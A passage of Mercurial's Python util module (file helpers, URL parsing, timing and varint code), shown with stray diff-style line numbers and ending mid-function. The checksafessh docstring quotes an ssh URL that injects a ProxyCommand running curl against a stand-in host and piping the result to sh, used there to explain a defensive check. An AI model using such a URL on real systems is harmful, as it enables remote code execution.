    def __del__(self):
        if safehasattr(self, '_fp'):  # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on clean exit, discard if an exception is propagating
        if exctype is not None:
            self.discard()
        else:
            self.close()
2529 2529
2530 2530
def unlinkpath(f, ignoremissing=False, rmdir=True):
    """unlink and remove the directory if it is empty"""
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    if not rmdir:
        return
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
2543 2543
2544 2544
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as err:
        if err.errno == errno.ENOENT:
            # already gone: that is exactly the outcome we wanted
            return
        raise
2552 2552
2553 2553
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            # already there: nothing to do (and no chmod, matching the
            # historical behavior)
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached the filesystem root without success
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err2:
            # Catch EEXIST to handle races
            if err2.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)
2581 2581
2582 2582
def readfile(path):
    """Return the entire binary contents of the file at *path*."""
    fp = open(path, b'rb')
    try:
        return fp.read()
    finally:
        fp.close()
2586 2586
2587 2587
def writefile(path, text):
    """Replace the contents of the file at *path* with the bytes *text*."""
    fp = open(path, b'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
2591 2591
2592 2592
def appendfile(path, text):
    """Append the bytes *text* to the file at *path*."""
    fp = open(path, b'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
2596 2596
2597 2597
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""

        def _resized(source):
            # re-emit anything larger than 1 MiB as 256 KiB slices so a
            # single huge chunk never dominates memory use
            for piece in source:
                if len(piece) <= 2 ** 20:
                    yield piece
                    continue
                start = 0
                while start < len(piece):
                    yield piece[start : start + 2 ** 18]
                    start += 2 ** 18

        self.iter = _resized(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0  # consumed prefix length of _queue[0]

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return b''.join(self.iter)

        remaining = l
        out = []
        q = self._queue
        while remaining > 0:
            if not q:
                # pull roughly 256 KiB more from the source iterator
                want = 2 ** 18
                for piece in self.iter:
                    q.append(piece)
                    want -= len(piece)
                    if want <= 0:
                        break
                if not q:
                    break  # source exhausted; short read

            # Consume from the head chunk in place.  We track the consumed
            # prefix in self._chunkoffset instead of popping/re-pushing a
            # trimmed chunk, which avoids extra deque mutations and string
            # copies for partial reads.
            head = q[0]
            offset = self._chunkoffset
            avail = len(head) - offset

            if remaining >= avail:
                # take everything left in the head chunk
                q.popleft()
                if offset:
                    out.append(head[offset:])
                else:
                    out.append(head)
                self._chunkoffset = 0
                remaining -= avail
            else:
                # take only part of the head chunk; just advance the offset
                out.append(head[offset : offset + remaining])
                self._chunkoffset = offset + remaining
                remaining = 0

        return b''.join(out)
2679 2679
2680 2680
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        nbytes = size if limit is None else min(limit, size)
        if not nbytes:
            # limit exhausted: never issue a zero-length read
            break
        data = f.read(nbytes)
        if not data:
            break  # EOF (or short read from a socket-like object)
        if limit is not None:
            limit -= len(data)
        yield data
2701 2701
2702 2702
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """

    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        remaining = self._left
        if not remaining:
            # budget exhausted: behave like EOF
            return b''

        if n < 0:
            n = remaining

        data = self._fh.read(min(n, remaining))
        self._left = remaining - len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0 : len(res)] = res
        return len(res)
2740 2740
2741 2741
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def render(count):
        magnitude = abs(count)
        for multiplier, divisor, fmt in unittable:
            # pick the first (i.e. coarsest) unit the value qualifies for
            if magnitude >= divisor * multiplier:
                return fmt % (count / float(divisor))
        # smaller than every threshold: use the last (finest) format
        return unittable[-1][2] % count

    return render
2752 2752
2753 2753
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    # order of the checks matters: an inverted range is reported before a
    # non-positive start line
    if toline < fromline:
        raise error.ParseError(_(b"line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_(b"fromline must be strictly positive"))
    return fromline - 1, toline
2774 2774
2775 2775
# render a byte count with the coarsest binary unit (GB/MB/KB/bytes)
# that keeps roughly three significant digits
bytecount = unitcountfn(
    (100, 1 << 30, _(b'%.0f GB')),
    (10, 1 << 30, _(b'%.1f GB')),
    (1, 1 << 30, _(b'%.2f GB')),
    (100, 1 << 20, _(b'%.0f MB')),
    (10, 1 << 20, _(b'%.1f MB')),
    (1, 1 << 20, _(b'%.2f MB')),
    (100, 1 << 10, _(b'%.0f KB')),
    (10, 1 << 10, _(b'%.1f KB')),
    (1, 1 << 10, _(b'%.2f KB')),
    (1, 1, _(b'%.0f bytes')),
)
2788 2788
2789 2789
class transformingwriter(object):
    """Writable file wrapper that pushes each chunk through an encoder.

    ``encode`` is applied to every payload handed to :meth:`write` before
    it is forwarded to the wrapped file object; close/flush are delegated
    untouched.
    """

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def write(self, data):
        return self._fp.write(self._encode(data))

    def flush(self):
        self._fp.flush()

    def close(self):
        self._fp.close()
2805 2805
2806 2806
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.  Used by tolf()/tocrlf() below.
_eolre = remod.compile(br'\r*\n')
2811 2811
2812 2812
2813 2813 def tolf(s):
2814 2814 return _eolre.sub(b'\n', s)
2815 2815
2816 2816
2817 2817 def tocrlf(s):
2818 2818 return _eolre.sub(b'\r\n', s)
2819 2819
2820 2820
2821 2821 def _crlfwriter(fp):
2822 2822 return transformingwriter(fp, tocrlf)
2823 2823
2824 2824
# Pick the EOL conversion helpers matching the host OS convention:
# CRLF on Windows, LF everywhere else (where no conversion is needed).
if pycompat.oslinesep == b'\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity
2833 2833
if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
    3,
    0,
):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #    | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" work fine, as we do not support Python < 2.7.4.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.

    def iterfile(fp):
        """Return an iterator over fp's lines that is safe against the
        CPython 2 EINTR bug for non-regular files (pipes, sockets, ttys)."""
        fastpath = True
        if type(fp) is file:
            # Only regular on-disk files take the fast (native) path.
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            # fp.readline deals with EINTR correctly, use it as a workaround.
            return iter(fp.readline, b'')


else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        """Return fp itself; iteration is EINTR-safe on this interpreter."""
        return fp
2878 2878
2879 2879
def iterlines(iterator):
    """Yield every text line contained in an iterable of data chunks.

    Line endings are dropped (str/bytes splitlines semantics).
    """
    for data in iterator:
        lines = data.splitlines()
        for current in lines:
            yield current
2884 2884
2885 2885
def expandpath(path):
    """Expand environment variables, then ~user constructs, in *path*."""
    expanded = os.path.expandvars(path)
    return os.path.expanduser(expanded)
2888 2888
2889 2889
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.

    NOTE: mapping keys are spliced into the pattern unescaped, so they must
    not contain regular-expression metacharacters.
    """
    fn = fn or (lambda s: s)
    patterns = b'|'.join(mapping.keys())
    if escape_prefix:
        patterns += b'|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # Work on a copy so the caller's mapping is not mutated when the
        # prefix character is registered as its own replacement (the
        # original code leaked this key into the caller's dict).
        mapping = dict(mapping)
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    # group() includes the prefix character; strip it before lookup.
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2914 2914
2915 2915
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        # Not numeric: fall back to a service-name lookup.
        try:
            return socket.getservbyname(pycompat.sysstr(port))
        except socket.error:
            raise error.Abort(
                _(b"no port number associated with service '%s'") % port
            )
2934 2934
2935 2935
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = b"!~*'()+"
    _safepchars = b"/!~*'()+:\\"
    _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = b''
        self._origpath = path

        if parsefragment and b'#' in path:
            path, self.fragment = path.split(b'#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith(b'\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith(b'bundle:'):
            self.scheme = b'bundle'
            path = path[7:]
            if path.startswith(b'//'):
                path = path[2:]
            self.path = path
            return

        # General case: a recognized "<scheme>:" prefix makes this a
        # non-local URL.
        if self._matchscheme(path):
            parts = path.split(b':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = b''
                return
        else:
            if self._localpath:
                self.path = path
                return

        if parsequery and b'?' in path:
            path, self.query = path.split(b'?', 1)
            if not path:
                path = None
            if not self.query:
                self.query = None

        # // is required to specify a host/authority
        if path and path.startswith(b'//'):
            parts = path[2:].split(b'/', 1)
            if len(parts) > 1:
                self.host, path = parts
            else:
                self.host = parts[0]
                path = None
            if not self.host:
                self.host = None
            # path of file:///d is /d
            # path of file:///d:/ is d:/, not /d:/
            if path and not hasdriveletter(path):
                path = b'/' + path

        if self.host and b'@' in self.host:
            self.user, self.host = self.host.rsplit(b'@', 1)
            if b':' in self.user:
                self.user, self.passwd = self.user.split(b':', 1)
            if not self.host:
                self.host = None

        # Don't split on colons in IPv6 addresses without ports
        if (
            self.host
            and b':' in self.host
            and not (
                self.host.startswith(b'[') and self.host.endswith(b']')
            )
        ):
            self._hostport = self.host
            self.host, self.port = self.host.rsplit(b':', 1)
            if not self.host:
                self.host = None

        if (
            self.host
            and self.scheme == b'file'
            and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
        ):
            raise error.Abort(
                _(b'file:// URLs can only refer to localhost')
            )

        self.path = path

        # leave the query string escaped
        for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in (
            b'scheme',
            b'user',
            b'passwd',
            b'host',
            b'port',
            b'path',
            b'query',
            b'fragment',
        ):
            v = getattr(self, a)
            if v is not None:
                attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
        return b'<url %s>' % b', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == b'bundle':
                s = b'bundle:' + s
            if self.fragment:
                s += b'#' + self.fragment
            return s

        s = self.scheme + b':'
        if self.user or self.passwd or self.host:
            s += b'//'
        # URLs like file:///tmp/x have no authority but still need '//'
        elif self.scheme and (
            not self.path
            or self.path.startswith(b'/')
            or hasdriveletter(self.path)
        ):
            s += b'//'
            if hasdriveletter(self.path):
                s += b'/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += b'@'
        if self.host:
            if not (self.host.startswith(b'[') and self.host.endswith(b']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
            if self.port:
                s += b':' + urlreq.quote(self.port)
        if self.host:
            s += b'/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += b'?' + self.query
        if self.fragment is not None:
            s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        """Return (url-without-credentials, auth data for urllib2 or None)."""
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host), self.user, self.passwd or b''))

    def isabs(self):
        """Return True if the URL is absolute (remote, or an absolute
        local path) and thus cannot be joined onto a base."""
        if self.scheme and self.scheme != b'file':
            return True  # remote URL
        if hasdriveletter(self.path):
            return True  # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True  # Windows UNC path
        if self.path.startswith(b'/'):
            return True  # POSIX-style
        return False

    def localpath(self):
        """Return the local filesystem path for file:// and bundle: URLs,
        otherwise the original unparsed path string."""
        if self.scheme == b'file' or self.scheme == b'bundle':
            path = self.path or b'/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + b'/' + self.path
            elif (
                self.host is not None and self.path and not hasdriveletter(path)
            ):
                path = b'/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (
            not self.scheme
            or self.scheme == b'file'
            or self.scheme == b'bundle'
        )
3262 3262
3263 3263
def hasscheme(path):
    """Return True if path parses as a URL with a scheme component."""
    return bool(url(path).scheme)
3266 3266
3267 3267
def hasdriveletter(path):
    """Return True when path starts with a Windows drive letter ("X:").

    A falsy path (empty bytes or None) is returned unchanged, preserving
    the original short-circuit semantics.
    """
    if not path:
        return path
    return path[1:2] == b':' and path[0:1].isalpha()
3270 3270
3271 3271
def urllocalpath(path):
    """Return the local path of *path*, without parsing query/fragment."""
    return url(path, parsequery=False, parsefragment=False).localpath()
3274 3274
3275 3275
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    # A leading '-' in the host position would be parsed by ssh as an option.
    if path.startswith((b'ssh://-', b'svn+ssh://-')):
        raise error.Abort(
            _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
        )
3291 3291
3292 3292
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = b'***'
    return bytes(parsed)
3299 3299
3300 3300
def removeauth(u):
    '''remove all authentication information from a url string'''
    parsed = url(u)
    parsed.user = None
    parsed.passwd = None
    return bytes(parsed)
3306 3306
3307 3307
# Render a duration in seconds as a short human-readable string (s/ms/us/ns).
# Each entry is a (threshold, unit-size, format) triple — presumably scanned
# in order by unitcountfn (defined earlier in this file), largest unit first.
# TODO(review): confirm triple semantics against unitcountfn's definition.
timecount = unitcountfn(
    (1, 1e3, _(b'%.0f s')),
    (100, 1, _(b'%.1f s')),
    (10, 1, _(b'%.2f s')),
    (1, 1, _(b'%.3f s')),
    (100, 0.001, _(b'%.1f ms')),
    (10, 0.001, _(b'%.2f ms')),
    (1, 0.001, _(b'%.3f ms')),
    (100, 0.000001, _(b'%.1f us')),
    (10, 0.000001, _(b'%.2f us')),
    (1, 0.000001, _(b'%.3f us')),
    (100, 0.000000001, _(b'%.1f ns')),
    (10, 0.000000001, _(b'%.2f ns')),
    (1, 0.000000001, _(b'%.3f ns')),
)
3323 3323
3324 3324
@attr.s
class timedcmstats(object):
    """Stats information produced by the timedcm context manager on entering."""

    # the starting value of the timer as a float (meaning and resolution is
    # platform dependent, see util.timer)
    start = attr.ib(default=attr.Factory(lambda: timer()))
    # the number of seconds as a floating point value; starts at 0, updated when
    # the context is exited.
    elapsed = attr.ib(default=0)
    # the number of nested timedcm context managers.
    level = attr.ib(default=1)

    def __bytes__(self):
        # elapsed == 0 means the context has not exited yet.
        return timecount(self.elapsed) if self.elapsed else b'<unknown>'

    __str__ = encoding.strmethod(__bytes__)
3342 3342
3343 3343
@contextlib.contextmanager
def timedcm(whencefmt, *whenceargs):
    """A context manager that produces timing information for a given context.

    On entering a timedcmstats instance is produced.

    This context manager is reentrant.

    """
    # track nested context managers
    timedcm._nested += 1
    timing_stats = timedcmstats(level=timedcm._nested)
    try:
        with tracing.log(whencefmt, *whenceargs):
            yield timing_stats
    finally:
        # elapsed is only filled in on exit; see timedcmstats.__bytes__.
        timing_stats.elapsed = timer() - timing_stats.start
        timedcm._nested -= 1


# Nesting depth counter stored on the function object itself; initialized
# here because the name only exists once the def above has run.
timedcm._nested = 0
3365 3365
3366 3366
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        with timedcm(pycompat.bytestr(func.__name__)) as stats:
            res = func(*args, **kwargs)
        # Indent by nesting level so nested timed calls read as a tree.
        procutil.stderr.write(
            b'%s%s: %s\n'
            % (
                b' ' * stats.level * 2,
                pycompat.bytestr(func.__name__),
                stats,
            )
        )
        return res

    return wrapper
3393 3393
3394 3394
# Suffix table for sizetoint(). Matching uses bytes.endswith in this order,
# so the bare b'b' entry must stay last or it would shadow b'kb'/b'mb'/b'gb'.
_sizeunits = (
    (b'm', 2 ** 20),
    (b'k', 2 ** 10),
    (b'g', 2 ** 30),
    (b'kb', 2 ** 10),
    (b'mb', 2 ** 20),
    (b'gb', 2 ** 30),
    (b'b', 1),
)
3404 3404
3405 3405
def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if spec.endswith(suffix):
                return int(float(spec[: -len(suffix)]) * multiplier)
        # No recognized suffix: plain byte count.
        return int(spec)
    except ValueError:
        raise error.ParseError(_(b"couldn't parse size: %s") % s)
3424 3424
3425 3425
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # list of (source, hook) pairs, sorted lazily at call time
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda pair: pair[0])
        return [hook(*args) for _source, hook in self._hooks]
3443 3443
3444 3444
def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
        length of longest filepath+line number,
        filepath+linenumber,
        function

    Not be used in production code but very convenient while developing.
    '''
    # [: -skip - 1] drops the innermost 'skip' frames plus this function's
    # own frame; [-depth:] keeps the 'depth' innermost remaining entries
    # (depth=0 keeps everything, since seq[-0:] == seq).
    entries = [
        (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
        for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
    ][-depth:]
    if entries:
        # Width of the widest file:line column, for aligned output.
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)
3468 3468
3469 3469
def debugstacktrace(
    msg=b'stacktrace',
    skip=0,
    f=procutil.stderr,
    otherf=procutil.stdout,
    depth=0,
    prefix=b'',
):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    if otherf:
        # Flush the other stream first so interleaved output stays ordered.
        otherf.flush()
    f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
    # skip + 1: also hide this debugstacktrace frame itself.
    for line in getstackframes(skip + 1, depth=depth):
        f.write(prefix + line)
    f.flush()


# convenient shortcut
dst = debugstacktrace
3494 3494
3495 3495
3496 3496 def safename(f, tag, ctx, others=None):
3497 3497 """
3498 3498 Generate a name that it is safe to rename f to in the given context.
3499 3499
3500 3500 f: filename to rename
3501 3501 tag: a string tag that will be included in the new name
3502 3502 ctx: a context, in which the new name must not exist
3503 3503 others: a set of other filenames that the new name must not be in
3504 3504
3505 3505 Returns a file name of the form oldname~tag[~number] which does not exist
3506 3506 in the provided context and is not in the set of other names.
3507 3507 """
3508 3508 if others is None:
3509 3509 others = set()
3510 3510
3511 3511 fn = b'%s~%s' % (f, tag)
3512 3512 if fn not in ctx and fn not in others:
3513 3513 return fn
3514 3514 for n in itertools.count(1):
3515 3515 fn = b'%s~%s~%s' % (f, tag, n)
3516 3516 if fn not in ctx and fn not in others:
3517 3517 return fn
3518 3518
3519 3519
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    data = stream.read(n)
    if len(data) == n:
        return data
    raise error.Abort(
        _(b"stream ended unexpectedly (got %d bytes, expected %d)")
        % (len(data), n)
    )
3529 3529
3530 3530
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
    ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
    pieces = []
    rest = value
    while True:
        group = rest & 0x7F
        rest >>= 7
        if rest:
            # more 7-bit groups follow: set the continuation bit
            pieces.append(pycompat.bytechr(0x80 | group))
        else:
            # final group: continuation bit clear
            pieces.append(pycompat.bytechr(group))
            break
    return b''.join(pieces)
3566 3566
3567 3567
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
    ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    value = 0
